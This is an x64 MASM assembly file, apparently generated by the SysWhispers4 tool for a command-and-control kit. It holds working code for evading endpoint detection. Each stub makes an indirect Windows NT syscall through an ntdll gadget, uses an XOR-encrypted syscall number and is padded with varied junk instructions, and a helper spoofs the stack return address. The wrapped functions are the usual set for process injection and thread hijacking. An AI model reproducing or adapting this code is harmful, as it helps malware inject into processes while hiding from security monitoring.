SW4_XOR_KEY EQU 09E40515Ah    ; Co2H kit-patched (mirror of C #define)

; SW4Syscalls.asm -- generated by SysWhispers4
; Method     : indirect
; Resolution : hells_gate
; Arch       : x64 / MASM (ml64.exe)
;
; Build: cl /nologo ... SW4Syscalls.c SW4Syscalls.asm
;        (ensure MASM64 is enabled in project settings)

OPTION DOTNAME

.data
    EXTERN SW4_SsnTable:DWORD
    EXTERN SW4_SyscallAddrTable:QWORD

.code

; =========================================================================
; Stack spoofing helper (synthetic frame)
; On entry: rax = target function address to call
;           All other registers set up for target
; Pushes a fake return address into ntdll before jumping to target.
; =========================================================================
EXTERN SW4_SpoofReturnAddr:QWORD   ; Pre-populated with a ntdll gadget addr

SW4_CallWithSpoofedStack PROC
    pop  r11                ; save real return address in r11
    push QWORD PTR [SW4_SpoofReturnAddr]  ; fake return address
    push r11                ; push real address below (not on visible stack)
    jmp  rax                ; jump to target (stack top = fake addr)
SW4_CallWithSpoofedStack ENDP

; --- SW4_NtCreateThreadEx (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtCreateThreadEx PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    cmp r11d, 001h
    test r11d, 099h
    lea r11, [r11]
    mov eax, DWORD PTR [SW4_SsnTable + 0]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 0]     ; -> ntdll gadget
SW4_NtCreateThreadEx ENDP


; --- SW4_NtWaitForSingleObject (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtWaitForSingleObject PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    lea r11, [r11]
    xchg ax, ax
    mov eax, DWORD PTR [SW4_SsnTable + 4]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 8]     ; -> ntdll gadget
SW4_NtWaitForSingleObject ENDP


; --- SW4_NtFreeVirtualMemory (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtFreeVirtualMemory PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    test r11d, 08Bh
    nop
    mov eax, DWORD PTR [SW4_SsnTable + 8]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 16]     ; -> ntdll gadget
SW4_NtFreeVirtualMemory ENDP


; --- SW4_NtWriteVirtualMemory (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtWriteVirtualMemory PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    lea r11, [r11]
    nop WORD PTR [rax + rax]
    fnop
    nop
    xor r11d, r11d
    or r11d, r11d
    mov eax, DWORD PTR [SW4_SsnTable + 12]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 24]     ; -> ntdll gadget
SW4_NtWriteVirtualMemory ENDP


; --- SW4_NtAllocateVirtualMemory (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtAllocateVirtualMemory PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    lea rsp, [rsp + 00h]
    cmp r11d, 00Dh
    xchg ax, ax
    xchg ax, ax
    mov eax, DWORD PTR [SW4_SsnTable + 16]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 32]     ; -> ntdll gadget
SW4_NtAllocateVirtualMemory ENDP


; --- SW4_NtResumeThread (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtResumeThread PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    push 09Ah
    pop r11
    push 09Ah
    pop r11
    xchg ax, ax
    push 09Ah
    pop r11
    xchg r11, r11
    mov eax, DWORD PTR [SW4_SsnTable + 20]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 40]     ; -> ntdll gadget
SW4_NtResumeThread ENDP


; --- SW4_NtGetContextThread (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtGetContextThread PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    xchg ax, ax
    xchg ax, ax
    nop
    fnop
    push 029h
    pop r11
    mov eax, DWORD PTR [SW4_SsnTable + 24]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 48]     ; -> ntdll gadget
SW4_NtGetContextThread ENDP


; --- SW4_NtCreateSection (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtCreateSection PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    test r11d, 030h
    nop DWORD PTR [rax]
    mov eax, DWORD PTR [SW4_SsnTable + 28]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 56]     ; -> ntdll gadget
SW4_NtCreateSection ENDP


; --- SW4_NtOpenProcess (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtOpenProcess PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    nop DWORD PTR [rax + 00h]
    lea r11, [r11]
    mov eax, DWORD PTR [SW4_SsnTable + 32]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 64]     ; -> ntdll gadget
SW4_NtOpenProcess ENDP


; --- SW4_NtTerminateProcess (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtTerminateProcess PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    nop
    mov eax, DWORD PTR [SW4_SsnTable + 36]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 72]     ; -> ntdll gadget
SW4_NtTerminateProcess ENDP


; --- SW4_NtUnmapViewOfSection (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtUnmapViewOfSection PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    lea rsp, [rsp + 00h]
    push 02Ch
    pop r11
    mov eax, DWORD PTR [SW4_SsnTable + 40]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 80]     ; -> ntdll gadget
SW4_NtUnmapViewOfSection ENDP


; --- SW4_NtReadVirtualMemory (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtReadVirtualMemory PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    xchg ax, ax
    xchg r11, r11
    lea rsp, [rsp + 00h]
    cmp r11d, 04Bh
    mov eax, DWORD PTR [SW4_SsnTable + 44]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 88]     ; -> ntdll gadget
SW4_NtReadVirtualMemory ENDP


; --- SW4_NtOpenSection (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtOpenSection PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    nop DWORD PTR [rax]
    nop DWORD PTR [rax]
    mov eax, DWORD PTR [SW4_SsnTable + 48]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 96]     ; -> ntdll gadget
SW4_NtOpenSection ENDP


; --- SW4_NtQueryInformationProcess (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtQueryInformationProcess PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    nop
    lea r11, [r11]
    nop
    fnop
    test r11d, 0B1h
    mov eax, DWORD PTR [SW4_SsnTable + 52]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 104]     ; -> ntdll gadget
SW4_NtQueryInformationProcess ENDP


; --- SW4_NtProtectVirtualMemory (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtProtectVirtualMemory PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    mov r11d, 0FBh
    lea r11, [r11]
    fnop
    nop WORD PTR [rax + rax]
    mov eax, DWORD PTR [SW4_SsnTable + 56]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 112]     ; -> ntdll gadget
SW4_NtProtectVirtualMemory ENDP


; --- SW4_NtSetContextThread (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtSetContextThread PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    nop
    xchg r11, r11
    fnop
    lea rsp, [rsp + 00h]
    mov eax, DWORD PTR [SW4_SsnTable + 60]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 120]     ; -> ntdll gadget
SW4_NtSetContextThread ENDP


; --- SW4_NtClose (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtClose PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    nop DWORD PTR [rax]
    lea rsp, [rsp + 00h]
    lea r11, [r11]
    cmp r11d, 068h
    nop
    mov eax, DWORD PTR [SW4_SsnTable + 64]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 128]     ; -> ntdll gadget
SW4_NtClose ENDP


; --- SW4_NtQueueApcThread (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtQueueApcThread PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    test r11d, 067h
    mov eax, DWORD PTR [SW4_SsnTable + 68]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 136]     ; -> ntdll gadget
SW4_NtQueueApcThread ENDP


; --- SW4_NtMapViewOfSection (indirect: jmp to syscall;ret in ntdll) ---
SW4_NtMapViewOfSection PROC
    mov r10, rcx                            ; syscall ABI: arg1 -> r10
    xchg ax, ax
    fnop
    cmp r11d, 047h
    test r11d, 0E2h
    nop DWORD PTR [rax + 00h]
    mov eax, DWORD PTR [SW4_SsnTable + 72]  ; load encrypted SSN
    xor eax, SW4_XOR_KEY                           ; decrypt
    jmp QWORD PTR [SW4_SyscallAddrTable + 144]     ; -> ntdll gadget
SW4_NtMapViewOfSection ENDP


END
